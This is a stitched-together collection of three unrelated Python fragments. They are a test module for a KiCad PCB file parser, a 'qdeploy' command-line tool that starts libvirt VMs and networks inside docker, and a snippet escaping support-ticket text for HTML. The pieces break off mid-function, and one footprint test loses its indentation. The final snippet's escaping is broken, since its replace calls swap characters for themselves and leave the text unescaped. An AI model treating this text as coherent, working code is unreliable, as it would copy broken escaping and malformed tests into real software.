(tracks 253)
(zones 0)
(modules 37)
(nets 25)
)"""
    tree = load_tree(general_sexp)
    board = PCB()
    parser_visitor = ParserVisitor(board)
    with patch.object(PCB, 'visitPcbGeneral', return_value=None) as visit_mock:
        _ = parser_visitor.node('general', tree)
        expected = PcbGeneral(
            thickness='1.6',
            drawings='4',
            tracks='253',
            zones='0',
            modules='37',
            nets='25'
        )
        visit_mock.assert_called_once_with(expected)
def test_parse_setup(self):
    """A full `setup` node (stackup + pcbplotparams) must be dispatched to
    PCB.visitPcbSetup as one PcbSetup value object; all scalars stay strings."""
    sexp_str = load_tree(""" (setup
(stackup
(layer "F.SilkS" (type "Top Silk Screen") (color "White"))
(layer "F.Paste" (type "Top Solder Paste"))
(layer "F.Mask" (type "Top Solder Mask") (color "Green") (thickness 0.01))
(layer "F.Cu" (type "copper") (thickness 0.035))
(layer "dielectric 1" (type "core") (thickness 0.480066) (material "FR4") (epsilon_r 4.5) (loss_tangent 0.02))
(layer "In1.Cu" (type "copper") (thickness 0.035))
(layer "dielectric 2" (type "prepreg") (thickness 0.480066) (material "FR4") (epsilon_r 4.5) (loss_tangent 0.02))
(layer "In2.Cu" (type "copper") (thickness 0.035))
(layer "dielectric 3" (type "core") (thickness 0.480066) (material "FR4") (epsilon_r 4.5) (loss_tangent 0.02))
(layer "B.Cu" (type "copper") (thickness 0.035))
(layer "B.Mask" (type "Bottom Solder Mask") (color "Green") (thickness 0.01))
(layer "B.Paste" (type "Bottom Solder Paste"))
(layer "B.SilkS" (type "Bottom Silk Screen") (color "White"))
(copper_finish "HAL lead-free")
(dielectric_constraints no)
)
(pad_to_mask_clearance 0)
(aux_axis_origin 40.9 173.1)
(pcbplotparams
(layerselection 0x00010fc_ffffffff)
(disableapertmacros false)
(usegerberextensions false)
(usegerberattributes true)
(usegerberadvancedattributes true)
(creategerberjobfile true)
(svguseinch false)
(svgprecision 6)
(excludeedgelayer false)
(plotframeref false)
(viasonmask false)
(mode 1)
(useauxorigin false)
(hpglpennumber 1)
(hpglpenspeed 20)
(hpglpendiameter 15.000000)
(dxfpolygonmode true)
(dxfimperialunits true)
(dxfusepcbnewfont true)
(psnegative false)
(psa4output false)
(plotreference true)
(plotvalue true)
(plotinvisibletext false)
(sketchpadsonfab false)
(subtractmaskfromsilk false)
(outputformat 1)
(mirror false)
(drillshape 0)
(scaleselection 1)
(outputdirectory "plots")
)
)""")
    pcb = PCB()
    visitor = ParserVisitor(pcb)
    with patch.object(PCB, 'visitPcbSetup', return_value=None) as mock_method:
        text_effects = visitor.node('setup', sexp_str)
        # Expected value mirrors the literal above field by field.
        mock_method.assert_called_once_with(PcbSetup(stackup_settings=StackupSettings(layers=[
            StackUpLayerSettings(name='F.SilkS', number='0', type='Top Silk Screen', color='White', thickness='', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='F.Paste', number='0', type='Top Solder Paste', color='', thickness='', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='F.Mask', number='0', type='Top Solder Mask', color='Green', thickness='0.01', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='F.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='dielectric 1', number='0', type='core', color='', thickness='0.480066', material='FR4', epsilon_r='4.5', loss_tangent='0.02'),
            StackUpLayerSettings(name='In1.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='dielectric 2', number='0', type='prepreg', color='', thickness='0.480066', material='FR4', epsilon_r='4.5', loss_tangent='0.02'),
            StackUpLayerSettings(name='In2.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='dielectric 3', number='0', type='core', color='', thickness='0.480066', material='FR4', epsilon_r='4.5', loss_tangent='0.02'),
            StackUpLayerSettings(name='B.Cu', number='0', type='copper', color='', thickness='0.035', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='B.Mask', number='0', type='Bottom Solder Mask', color='Green', thickness='0.01', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='B.Paste', number='0', type='Bottom Solder Paste', color='', thickness='', material='', epsilon_r='', loss_tangent=''),
            StackUpLayerSettings(name='B.SilkS', number='0', type='Bottom Silk Screen', color='White', thickness='', material='', epsilon_r='', loss_tangent='')
        ], copper_finish='HAL lead-free', dielectric_constraints='no', edge_connector='', castellated_pads='', edge_plating=''),
        plot_settings=PlotSettings(
            layerselection='0x00010fc_ffffffff', disableapertmacros='false', usegerberextensions='false',
            usegerberattributes='true', usegerberadvancedattributes='true', creategerberjobfile='true',
            svguseinch='false', svgprecision='6', excludeedgelayer='false', plotframeref='false',
            viasonmask='false', mode='1', useauxorigin='false', hpglpennumber='1', hpglpenspeed='20',
            hpglpendiameter='15.000000', dxfpolygonmode='true', dxfimperialunits='true', dxfusepcbnewfont='true',
            psnegative='false', psa4output='false', plotreference='true', plotvalue='true',
            plotinvisibletext='false', sketchpadsonfab='false', subtractmaskfromsilk='false',
            outputformat='1', mirror='false', drillshape='0', scaleselection='1', outputdirectory='plots'),
        pad_to_mask_clearance='0', solder_mask_min_width='', pad_to_paste_clearance='',
        pad_to_paste_clearance_ratio='', aux_axis_origin=[40.9, 173.1], grid_origin=[], copper_finish='',
        dielectric_constraints='', edge_connector='', castellated_pads='', edge_plating=''))
def test_parse_layers(self):
    """Each entry of a `layers` node must yield a PcbLayer visit."""
    layers_sexp = """ (layers
(0 "F.Cu" signal)
)"""
    tree = load_tree(layers_sexp)
    board = PCB()
    parser_visitor = ParserVisitor(board)
    with patch.object(PCB, 'visitLayer', return_value=None) as visit_mock:
        _ = parser_visitor.node('layers', tree)
        visit_mock.assert_called_once_with(PcbLayer(
            ordinal=0, canonical_name='F.Cu', type='signal', user_name=''))
def test_parse_segment(self):
    """A plain `segment` node maps to TrackSegment with locked=False."""
    INPUT_STRINGG = """ (segment (start 61.976 103.124) (end 62.775999 103.923999) (width 0.381) (layer "F.Cu") (net 1) (tstamp 9208ea78-8dde-4b3d-91e9-5755ab5efd9a))"""
    sexp_str = load_tree(INPUT_STRINGG)
    pcb = PCB()
    visitor = ParserVisitor(pcb)
    with patch.object(PCB, 'visitSegment', return_value=None) as mock_method:
        text_effects = visitor.node('segment', sexp_str)
        mock_method.assert_called_once_with(TrackSegment(
            start=(61.976, 103.124),
            end=(62.775999, 103.923999),
            width=0.381,
            layer='F.Cu',
            locked=False,
            net=1,
            tstamp='9208ea78-8dde-4b3d-91e9-5755ab5efd9a'))
def test_parse_segment_locked(self):
    """The `locked` token on a segment must set TrackSegment.locked=True."""
    INPUT_STRINGG = """ (segment locked (start 61.976 103.124) (end 62.775999 103.923999) (width 0.381) (layer "F.Cu") (net 1) (tstamp 9208ea78-8dde-4b3d-91e9-5755ab5efd9a))"""
    sexp_str = load_tree(INPUT_STRINGG)
    pcb = PCB()
    visitor = ParserVisitor(pcb)
    with patch.object(PCB, 'visitSegment', return_value=None) as mock_method:
        text_effects = visitor.node('segment', sexp_str)
        mock_method.assert_called_once_with(TrackSegment(
            start=(61.976, 103.124),
            end=(62.775999, 103.923999),
            width=0.381,
            layer='F.Cu',
            locked=True,
            net=1,
            tstamp='9208ea78-8dde-4b3d-91e9-5755ab5efd9a'))
def test_parse_via(self):
    """A `via` node maps to TrackVia; absent flags default to ''/False."""
    INPUT_STRINGG = """ (via (at 69.088 112.776) (size 0.8) (drill 0.4) (layers "F.Cu" "B.Cu") (net 23) (tstamp f220d6a7-3170-4e04-8de6-2df0c3962fe0))"""
    sexp_str = load_tree(INPUT_STRINGG)
    pcb = PCB()
    visitor = ParserVisitor(pcb)
    with patch.object(PCB, 'visitVia', return_value=None) as mock_method:
        text_effects = visitor.node('via', sexp_str)
        mock_method.assert_called_once_with(TrackVia(
            via_type='', locked=False, at=(69.088, 112.776), size=0.8,
            drill=0.4, layers=['F.Cu', 'B.Cu'],
            remove_unused_layers=False, keep_end_layers=False, free=False,
            net=23, tstamp='f220d6a7-3170-4e04-8de6-2df0c3962fe0'))
def test_parse_net(self):
    """A `net` node must be delivered to PCB.visitNet as a Net object."""
    tree = load_tree(""" (net 39 "unconnected-(P2-Pad2)")""")
    board = PCB()
    parser_visitor = ParserVisitor(board)
    with patch.object(PCB, 'visitNet', return_value=None) as visit_mock:
        _ = parser_visitor.node('net', tree)
        visit_mock.assert_called_once_with(Net(ordinal=39, netname='unconnected-(P2-Pad2)'))
def test_parse_gr_lines(self):
    """A `gr_line` node maps to PcbGraphicalLine (angle defaults to 0)."""
    INPUT_STRINGG = """ (gr_line (start 50.8 50.8) (end 50.8 158.98) (layer "Edge.Cuts") (width 0.15) (tstamp 00000000-0000-0000-0000-000060977f7d))"""
    sexp_str = load_tree(INPUT_STRINGG)
    pcb = PCB()
    visitor = ParserVisitor(pcb)
    with patch.object(PCB, 'visitPcbGraphicalLine', return_value=None) as mock_method:
        text_effects = visitor.node('gr_line', sexp_str)
        mock_method.assert_called_once_with(PcbGraphicalLine(
            start=(50.8, 50.8), end=(50.8, 158.98), angle=0, width=0.15,
            layer='Edge.Cuts', tstamp='00000000-0000-0000-0000-000060977f7d'))
def test_parse_footprint(self):
INPUT_STRING = """ (footprint "Capacitor_THT:CP_Axial_L18.0mm_D6.5mm_P25.00mm_Horizontal" (layer "F.Cu")
(tedit 5A533291) (tstamp 00000000-0000-0000-0000-000054032b86)
(at 110.49 78.867 180)
(descr "CP, Axial series, Axial, Horizontal, pin pitch=25mm, , length*diameter=18*6.5mm^2, Electrolytic Capacitor, , http://www.vishay.com/docs/28325/021asm.pdf")
(tags "CP Axial series Axial Horizontal pin pitch 25mm length 18mm diameter 6.5mm Electrolytic Capacitor")
(property "Sheetfile" "pic_programmer.kicad_sch")
(property "Sheetname" "")
(path "/00000000-0000-0000-0000-0000442a5056")
(attr through_hole)
(fp_text reference "C1" (at 12.5 -4.31 180) (layer "F.SilkS")
(effects (font (size 1 1) (thickness 0.15)))
(tstamp a6f1cee4-350a-49d7-858b-50d3e3d852dc)
)
(fp_text value "100µF" (at 12.5 4.31 180) (layer "F.Fab")
(effects (font (size 1 1) (thickness 0.15)))
(tstamp 6714d3d0-67c3-4e88-bf4d-4c5f778e0892)
)
(fp_text user "${REFERENCE}" (at 12.5 0 180) (layer "F.Fab")
(effects (font (size 1 1) (thickness 0.15)))
(tstamp bc27282e-eeb3-4ed4-b421-f3a6eaa2e2b5)
)
(fp_line (start 3.38 3.37) (end 5.18 3.37) (layer "F.SilkS") (width 0.12) (tstamp 3462ecc2-1bae-4a89-9f65-63a9e667d09c))
(fp_line (start 6.98 -3.37) (end 21.62 -3.37) (layer "F.SilkS") (width 0.12) (tstamp 4d1afc95-4219-4bbd-9746-9af92b8382e5))
(fp_line (start 1.44 0) (end 3.38 0) (layer "F.SilkS") (width 0.12) (tstamp 58df7ef1-b92a-49a0-8639-c0c281311c8c))
(fp_line (start 5.18 3.37) (end 6.08 2.47) (layer "F.SilkS") (width 0.12) (tstamp 8959f01b-661c-44a4-a6b5-b57e597117d1))
(fp_line (start 6.08 2.47) (end 6.98 3.37) (layer "F.SilkS") (width 0.12) (tstamp 928467d1-ef81-4aa0-b95a-3562ac729310))
(fp_line (start 6.08 -2.47) (end 6.98 -3.37) (layer "F.SilkS") (width 0.12) (tstamp 9f77a334-8c05-44eb-8734-b02323623980))
(fp_line (start 3.38 -3.37) (end 5.18 -3.37) (layer "F.SilkS") (width 0.12) (tstamp a5ffbea5-7343-4e67-95ca-798ecf1a31fd))
(fp_line (start 2.18 -3.5) (end 2.18 -1.7) (layer "F.SilkS") (width 0.12) (tstamp b2ac688b-7bb5-4f97-83f4-4421e72e5ebf))
(fp_line (start 23.56 0) (end 21.62 0) (layer "F.SilkS") (width 0.12) (tstamp bffcf4d1-909b-4c58-a5be-6561a7007f9d))
(fp_line (start 6.98 3.37) (end 21.62 3.37) (layer "F.SilkS") (width 0.12) (tstamp c4dcabfd-61e1-4503-9ff2-b41ab53d91aa))
(fp_line (start 3.38 -3.37) (end 3.38 3.37) (layer "F.SilkS") (width 0.12) (tstamp d75f58b8-4e6d-4e45-b9c3-b942ded81af0))
(fp_line (start 5.18 -3.37) (end 6.08 -2.47) (layer "F.SilkS") (width 0.12) (tstamp e0db893c-3ed0-4514-88f8-12392d977eb3))
(fp_line (start 1.28 -2.6) (end 3.08 -2.6) (layer "F.SilkS") (width 0.12) (tstamp e67045ec-7ac2-4e58-adbd-ba06b515c475))
(fp_line (start 21.62 -3.37) (end 21.62 3.37) (layer "F.SilkS") (width 0.12) (tstamp e7e8636e-8a1d-4bd2-9304-51c7bf88ca86))
(fp_line (start 26.45 3.65) (end 26.45 -3.65) (layer "F.CrtYd") (width 0.05) (tstamp 5a03366f-05a8-4568-93d7-90ee54ce1ff3))
(fp_line (start 26.45 -3.65) (end -1.45 -3.65) (layer "F.CrtYd") (width 0.05) (tstamp e12abc24-3857-4264-8f78-760101a7cc3a))
(fp_line (start -1.45 -3.65) (end -1.45 3.65) (layer "F.CrtYd") (width 0.05) (tstamp f10e3c6e-61e7-4406-8325-82fe978579b0))
(fp_line (start -1.45 3.65) (end 26.45 3.65) (layer "F.CrtYd") (width 0.05) (tstamp fe3f3336-5cdc-4945-bb13-258cab45397b))
(fp_line (start 5.18 -3.25) (end 6.08 -2.35) (layer "F.Fab") (width 0.1) (tstamp 01242f51-9ef5-41ff-8af9-2bdf66835e68))
(fp_line (start 6.98 -3.25) (end 21.5 -3.25) (layer "F.Fab") (width 0.1) (tstamp 06c3c0e6-7385-4c0b-9f22-d75dd843999d))
(fp_line (start 6.98 3.25) (end 21.5 3.25) (layer "F.Fab") (width 0.1) (tstamp 09b3b400-f689-4913-9c2a-b2fb5a9c8fe9))
(fp_line (start 5.2 0) (end 7 0) (layer "F.Fab") (width 0.1) (tstamp 1cd0ab3b-0f4f-4cc1-9e4e-c3de697a4b0c))
(fp_line (start 0 0) (end 3.5 0) (layer "F.Fab") (width 0.1) (tstamp 370894ef-352b-48a4-96be-27098b7d9461))
(fp_line (start 3.5 3.25) (end 5.18 3.25) (layer "F.Fab") (width 0.1) (tstamp 3c84e368-3edc-42e0-8982-20119cfb45c2))
(fp_line (start 5.18 3.25) (end 6.08 2.35) (layer "F.Fab") (width 0.1) (tstamp 58f08ba5-d0e3-43fb-8beb-54efdce75f59))
(fp_line (start 6.08 -2.35) (end 6.98 -3.25) (layer "F.Fab") (width 0.1) (tstamp 5bf8b68b-0b4d-40fe-a110-744583af3d4a))
(fp_line (start 3.5 -3.25) (end 3.5 3.25) (layer "F.Fab") (width 0.1) (tstamp 6854b04c-649e-4a30-b3ab-bda4116a5800))
(fp_line (start 3.5 -3.25) (end 5.18 -3.25) (layer "F.Fab") (width 0.1) (tstamp 8c26551c-34ed-4948-86f2-5130f204da63))
(fp_line (start 21.5 -3.25) (end 21.5 3.25) (layer "F.Fab") (width 0.1) (tstamp 95b82f4c-5c3b-488f-bcd4-94fa52f1c68a))
(fp_line (start 25 0) (end 21.5 0) (layer "F.Fab") (width 0.1) (tstamp acf4f9ad-dce8-45ef-b6fe-68166c97c929))
(fp_line (start 6.08 2.35) (end 6.98 3.25) (layer "F.Fab") (width 0.1) (tstamp b1538173-2109-4b6b-b681-1a93dc0f2cb2))
(fp_line (start 6.1 -0.9) (end 6.1 0.9) (layer "F.Fab") (width 0.1) (tstamp bbf21b15-3165-4683-902a-e1e739cc2923))
(pad "1" thru_hole rect locked (at 0 0 180) (size 2.4 2.4) (drill 1.2) (layers *.Cu *.Mask)
(net 17 "VCC") (pintype "passive") (tstamp d6f6699b-7183-4350-ba44-c47e828a3a04))
(pad "2" thru_hole oval locked (at 25 0 180) (size 2.4 2.4) (drill 1.2) (layers *.Cu | |
#!/usr/bin/env python2.7
"""
generate files to deploy libvirt vms and nws, possibly in a docker environment
"""
from __future__ import print_function
import logging
import os
import shutil
import sys
import shlex
import argparse
from copy import deepcopy
from enum import Enum
from lxml import etree
import argh
from argh.decorators import arg, named
from argh.exceptions import CommandError
from etconfig import ElementConfError, load, id2elt
from qdeploy.utils import cmd, resource_path
try: # py3
from shlex import quote as sh_quote
except ImportError: # py2
from pipes import quote as sh_quote
# pylint: disable=invalid-name
logger = logging.getLogger(__name__)
logging.basicConfig(handlers=[logging.StreamHandler()], level=logging.DEBUG)
conf = None
# directory containing
# - the files needed to build the docker container
# -
QDEPLOY_RESOURCES_DIR = ".qdeploy"
QDEPLOY_CONF = "./qdeploy.conf"
QDEPLOY_DEFAULT_CONTAINER_NAME = "qdeploy"
def vm_extend(vm, vm_defaults):
    """Copy into *vm* every child of *vm_defaults* whose tag is absent.

    Children already present in *vm* (matched by tag) are left alone, so
    explicit per-vm settings always win over the defaults.

    :param vm: Element representing the vm parameters (mutated in place)
    :param vm_defaults: Element representing the vm default parameters
    """
    for default in vm_defaults:
        if vm.find(default.tag) is not None:
            continue  # an explicit value exists; keep it
        vm.append(deepcopy(default))
def get_vm_group(group_name):
    """Return the vm names belonging to the named group in the config.

    :param group_name: text of the group's <name> element
    :returns: list of vm name strings; empty when the group is unknown
    """
    root = conf
    elems = root.findall('./group[name="{}"]/vm'.format(group_name))
    # findall() always returns a list (empty on no match), so the former
    # `if elems is None: return []` guard was dead code.
    return [e.text for e in elems]
def find_elem_list(tag, name_list, _all=False):
    """find a list of Element with:

    :param tag: Element tag to find
    :param name_list: names of Element to find (may be None)
    :param _all: select every <tag> element instead of the named ones
        (Default value = False)
    :raises CommandError: when both or neither of `_all`/`name_list` are
        given, or a named element is missing

    The form is:
    <{tag}><name>text</name></{tag}>
    """
    if name_list is None:
        name_list = []
    root = conf
    if _all and len(name_list) > 0:
        raise CommandError("Cannot have both '-all' and a list of names")
    if not _all and len(name_list) == 0:
        raise CommandError("Must have either '-all' or a list of names")
    if _all:
        return root.findall(tag)
    res_elem_list = []
    for name in name_list:
        res = root.find('./{}[name="{}"]'.format(tag, name))
        if res is None:
            # Fixed message quoting: it used to render as
            # "vm 'foo not found'" instead of "vm 'foo' not found".
            raise CommandError("{} '{}' not found".format(tag, name))
        res_elem_list.append(res)
    return res_elem_list
def generate_network_xml_file(resource_dir, nw):
    """Generate a libvirt xml file defining a network.

    :param resource_dir: target directory
    :param nw: Element representing the xml to produce
    :returns: the path+name of the file (relative when resource_dir is
        relative — the old docstring wrongly claimed it was absolute)
    """
    name = nw.find('name').text
    xml = etree.tostring(nw, pretty_print=True)
    xml_file_name = os.path.join(resource_dir, "nw-" + name + ".xml")
    # Leftover debug print() calls of the file name and cwd were removed.
    with open(xml_file_name, 'w+') as xml_file:
        xml_file.write(xml)
    return xml_file_name
def is_running_in_docker():
    """Tell whether the qdeploy.conf file defines a <docker> section."""
    return conf.find("docker") is not None
def run_in_container(a_cmd, _interactive=False, _detached=False):
    """execute a system command possibly inside the docker container

    :param a_cmd: the command, as a string or an argv list
    :param _interactive: allocate an interactive tty (Default value = False)
    :param _detached: run detached, then wait and report errors
        (Default value = False)
    :returns: the result object produced by ``cmd``
    """
    if is_running_in_docker():
        opts = "-ti" if _interactive else "-t"
        container_name = get_container_name()
        if not container_name:
            raise CommandError("No docker container name defined in qdeploy.conf")
        container_exec = ["docker", "exec", opts, container_name]
        # normalize to an argv list so it can be prefixed with docker exec
        if isinstance(a_cmd, str):
            a_cmd = shlex.split(a_cmd)
        cmd_to_execute = container_exec + a_cmd
    else:
        # no docker section: run directly on the host
        cmd_to_execute = a_cmd
    res = cmd(cmd_to_execute, _log=logger, _detached=_detached)
    if _detached:
        res.wait()
        res.print_on_error()
    return res
def generate_virt_install_cmd(vm, vm_defaults, extra_args=None):
    """generate vm xml using virt-install

    :param vm: Element node representing vm — NOTE: mutated in place
        (defaults, a default <disk>, and possibly an <import> child are
        added)
    :param vm_defaults: Element of default parameters, or None
    :param extra_args: extra command-line arguments; when falsy the vm is
        imported instead of installed
    :returns: an array representing the virt-install command to import
        the vm.
    """
    if not extra_args:
        # no install args given: import the pre-existing disk image
        etree.SubElement(vm, 'import')
        extra_args = []
    # etree.SubElement(vm, 'transient')
    # etree.SubElement(vm, 'noautoconsole')
    cmd_array = ['virt-install']
    name = vm.find('name').text
    if vm_defaults is not None:
        vm_extend(vm, vm_defaults)
    if vm.find("disk") is None:
        # assume:
        # 1. cwd mounted in the same location in docker
        # 2. a qcow2 exist with the name of the vm
        disk_element = etree.SubElement(vm, 'disk')
        disk_element.text = os.path.join(os.getcwd(), name + ".qcow2")
    # Each child element becomes a --<tag> option; attributes render as
    # comma-joined key=value pairs, otherwise the element text is the value.
    for arg_i in list(vm):
        cmd_array.append('--' + arg_i.tag)
        val = None
        if arg_i.attrib:
            attrs = ",".join(["{}={}".format(k, v) for k, v in arg_i.attrib.items()])
            val = attrs
        else:
            val = arg_i.text
        if val:
            cmd_array.append(sh_quote(val))
    cmd_array = cmd_array + extra_args
    return cmd_array
def get_container_name():
    """get container name from conf file or default name 'qdeploy' if
    none provided

    Returns None when the conf has no docker/name element at all.
    """
    name_node = conf.find("docker/name")
    if name_node is None:
        return None
    # empty <name/> means: fall back to the default container name
    return name_node.text or QDEPLOY_DEFAULT_CONTAINER_NAME
def do_start_docker():
    """start docker container by calling the .qdeploy/start_docker.sh
    script

    Mounts come from docker/mount entries (host:container, or a bare
    path mounted onto itself); docker/x11 toggles X11 forwarding.
    """
    mounts = ""
    use_x11 = "false"
    root = conf
    container_name = get_container_name()
    if not container_name:
        raise CommandError("No docker container name defined in qdeploy.conf")
    for m in root.iterfind("docker/mount"):
        mount = m.text if ":" in m.text else m.text + ":" + m.text
        mounts += " -v " + mount
    x11_node = root.find("docker/x11")
    if x11_node is not None:
        use_x11 = x11_node.text
    # run the helper script from the resources dir without changing cwd
    res = cmd(["./start_docker.sh", container_name, use_x11, mounts],
              _log=logger, _cwd=QDEPLOY_RESOURCES_DIR)
    res.exit_on_error()
def do_stop_docker():
    """stop docker container by calling the .qdeploy/stop_docker.sh
    script
    """
    container_name = get_container_name()
    if not container_name:
        raise CommandError("No docker container name defined in qdeploy.conf")
    # Use _cwd (as do_start_docker does) instead of os.chdir(), which
    # permanently changed the process working directory for the caller.
    res = cmd("./stop_docker.sh {container}", container=container_name,
              _log=logger, _cwd=QDEPLOY_RESOURCES_DIR)
    res.print_on_error()
    print(res.out)
def do_start_nw(nw):
    """define and start a network

    :param nw: Element representing the network in libvirt format
    """
    xml_file_name = generate_network_xml_file(QDEPLOY_RESOURCES_DIR, nw)
    name = nw.find('name').text
    abs_path = os.path.join(os.getcwd(), xml_file_name)
    # assume xml_file_name mounted in docker at the same location
    run_in_container(["virsh", "net-define", "--file", abs_path])
    run_in_container(["virsh", "net-start", name])
def do_stop_nw(nw):
    """stop and undefine a network

    :param nw: Element representing the network in libvirt format; only
        its <name> is used here
    """
    # xml_file_name = generate_network_xml_file(QDEPLOY_RESOURCES_DIR, nw)
    name = nw.find('name').text
    # abs_path = os.path.join(os.getcwd(), xml_file_name)
    # assume xml_file_name mounted in docker at the same location
    run_in_container(["virsh", "net-destroy", name])
    run_in_container(["virsh", "net-undefine", name])
def do_start_vm(vm, extra_args=None):
    """start a vm using virt-install

    :param vm: Element representing the vm (xml Element that can be
        directly converted to virt-install command line)
    :param extra_args: extra virt-install arguments; when None the vm is
        imported rather than installed
    :returns: result object of the executed command
    """
    root = conf
    vm_defaults = root.find("vm_defaults")
    virtinst_cmd = generate_virt_install_cmd(vm, vm_defaults, extra_args)
    res = run_in_container(virtinst_cmd)
    return res
class StopMode(Enum):
    """Ways a vm can be taken down (see do_stop_vm)."""

    # force power-off, then undefine
    DESTROY = 1
    # cooperative guest shutdown, then undefine
    SHUTDOWN = 2
    # reboot only; the domain stays defined
    REBOOT = 3
def do_stop_vm(vm, stop_mode=StopMode.DESTROY):
    """undefine and stop a vm

    :param vm: Element representing the vm. Only the name is actually
        needed here.
    :param stop_mode: how to take the vm down (Default: StopMode.DESTROY)
    """
    # root = conf
    name = vm.find('name').text
    if stop_mode == StopMode.DESTROY:
        run_in_container(["virsh", "destroy", name])
        run_in_container(["virsh", "undefine", name])
    elif stop_mode == StopMode.SHUTDOWN:
        # NOTE(review): `virsh shutdown` is asynchronous; undefine is issued
        # immediately afterwards, while the domain may still be running —
        # confirm this ordering is intended.
        run_in_container(["virsh", "shutdown", name])
        run_in_container(["virsh", "undefine", name])
    elif stop_mode == StopMode.REBOOT:
        run_in_container(["virsh", "reboot", name])
    else:
        print("internal error invalid stop mode")
def assert_conf():
    """
    check if config file has been loaded successfully or exit on error
    """
    # `conf` is only read here, so the former `global conf` declaration
    # was unnecessary.
    if conf is None:
        sys.exit(1)
#----------------------------------------------------------------------
# CLI commands
#----------------------------------------------------------------------
@named("dump")
def cmd_dumpconf():
    """dump qdeploy.conf to xml. debug purpose"""
    # `conf` is only read, so the former `global conf` was unnecessary.
    assert_conf()
    # NOTE(review): relies on the loaded conf object exposing toxml();
    # confirm against etconfig's return type.
    print(conf.toxml())
@named("init")
def cmd_init(force=False):
    """writes files needed by 'env-start' to '.qdeploy/' directory

    :param force: overwrite an existing '.qdeploy/' directory if True
        (Default value = False)
    """
    assert_conf()
    resources_path = resource_path('resources')
    if os.path.isdir(QDEPLOY_RESOURCES_DIR):
        if force:
            shutil.rmtree(QDEPLOY_RESOURCES_DIR)
        else:
            print ("Error: {} already existing. use -force".
                   format(QDEPLOY_RESOURCES_DIR))
            sys.exit(1)
    print("=> Copying resources to {resources}".format(
        resources=QDEPLOY_RESOURCES_DIR))
    shutil.copytree(resources_path, QDEPLOY_RESOURCES_DIR)
@named("start")
def cmd_start():
    """
    start docker environment, then all networks and all vms
    """
    assert_conf()
    # regenerate the .qdeploy resources so env-start runs fresh scripts
    cmd_init(force=True)
    cmd_start_env()
    cmd_start_nw(net_names=None, start_all=True)
    cmd_start_vm(vm_names=None, start_all=True)
@named("stop")
def cmd_stop():
    """
    stop the docker environment

    NOTE(review): the original docstring claimed networks and vms are
    stopped too, but only cmd_stop_env() is called — presumably stopping
    the container tears down what runs inside it; confirm.
    """
    assert_conf()
    cmd_stop_env()
@named("env-start")
def cmd_start_env():
    """
    start docker container
    """
    assert_conf()
    root = conf
    if is_running_in_docker():
        do_start_docker()
        # commands to run inside the freshly started container
        for c in root.iterfind("docker/start_cmd"):
            run_in_container(c.text)
    # host-side start commands
    for c in root.iterfind("start_cmd"):
        cmd(c.text, _log=logger)
@named("env-stop")
def cmd_stop_env():
    """
    stop docker container
    """
    assert_conf()
    root = conf
    if is_running_in_docker():
        # Run the configured docker stop commands while the container is
        # still up; previously do_stop_docker() ran first, so the
        # subsequent `docker exec` of each stop_cmd targeted a stopped
        # container and could not succeed.
        for c in root.iterfind("docker/stop_cmd"):
            run_in_container(c.text)
        do_stop_docker()
    # host-side stop commands
    for c in root.iterfind("stop_cmd"):
        cmd(c.text, _log=logger)
@named("vm-list")
def cmd_list_vm():
    """display vms in qdeploy.conf
    """
    assert_conf()
    for name_node in conf.iterfind("vm/name"):
        print(name_node.text)
@named("net-list")
def cmd_list_nw():
    """display networks in qdeploy.conf
    """
    assert_conf()
    for name_node in conf.iterfind("network/name"):
        print(name_node.text)
@named("vm-start")
@arg("vm_names", nargs='*')
@arg("-a", "--all", dest="start_all")
def cmd_start_vm(vm_names, start_all=False, group=None):
    """start one or several vms

    :param vm_names: list of vm names
    :param start_all: start all if True (Default value = False)
    :param group: name of a vm group; overrides vm_names when given
    """
    assert_conf()
    if group is not None:
        vm_names = get_vm_group(group)
    vm_list = find_elem_list("vm", vm_names, start_all)
    for vm in vm_list:
        do_start_vm(vm)
@named("vm-install")
@arg("vm_name")
@arg('args', nargs=argparse.REMAINDER, help="extra virt-install args")
def cmd_install_vm(vm_name, args):
    """install a vm

    :param vm_name: name of the vm to install
    :param args: extra parameters handed through to virt-install
    """
    assert_conf()
    # (a leftover debug `print(args)` was removed here)
    vm_list = find_elem_list("vm", [vm_name])
    do_start_vm(vm_list[0], args)
@named("vm-stop")
@arg("vm_names", nargs='*', help="names of the vms to stop")
@arg("-a", "--all", dest="stop_all", help="stop all vms defined in qdeploy.conf")
@arg("-s", "--shutdown")
@arg("-r", "--reboot")
def cmd_stop_vm(vm_names, stop_all=False, shutdown=False, reboot=False, group=None):
    """stop and undefine one or several vms. By default the vm is destroyed.

    :param vm_names: names of the vms to stop
    :param stop_all: stop every vm from qdeploy.conf
    :param shutdown: request a cooperative shutdown instead of destroy
    :param reboot: reboot instead of stopping (mutually exclusive with
        --shutdown)
    :param group: name of a vm group; overrides vm_names when given
    """
    assert_conf()
    if shutdown and reboot:
        raise CommandError("Cannot have both '--shutdown' and '--reboot'")
    if shutdown:
        stop_mode = StopMode.SHUTDOWN
    elif reboot:
        stop_mode = StopMode.REBOOT
    else:
        stop_mode = StopMode.DESTROY
    if group is not None:
        vm_names = get_vm_group(group)
    vm_list = find_elem_list("vm", vm_names, stop_all)
    for vm in vm_list:
        do_stop_vm(vm, stop_mode)
@named("net-start")
@arg("net_names", nargs='*')
@arg("-a", "--all", dest="start_all")
def cmd_start_nw(net_names, | |
Set"
notSet = False
requestseverity = sev
requestsubject_temps = str(d["ticket"]["subject"]).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">")
requestsubject = str(requestsubject_temps)
requestdescription_temps = str(d["ticket"]["description"])
requestdescription = str(requestdescription_temps).replace("&", "&").replace("<", "<").replace('"', """).replace("'", "'").replace(">", ">").replace("\n\n \n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n\n", "<br/><br/>").replace("\n\n \n\n \n", "<br/><br/>").replace("\n\n \n\n", "<br/><br/>").replace("\n\n", "<br/><br/>").replace("\n", "<br/>")
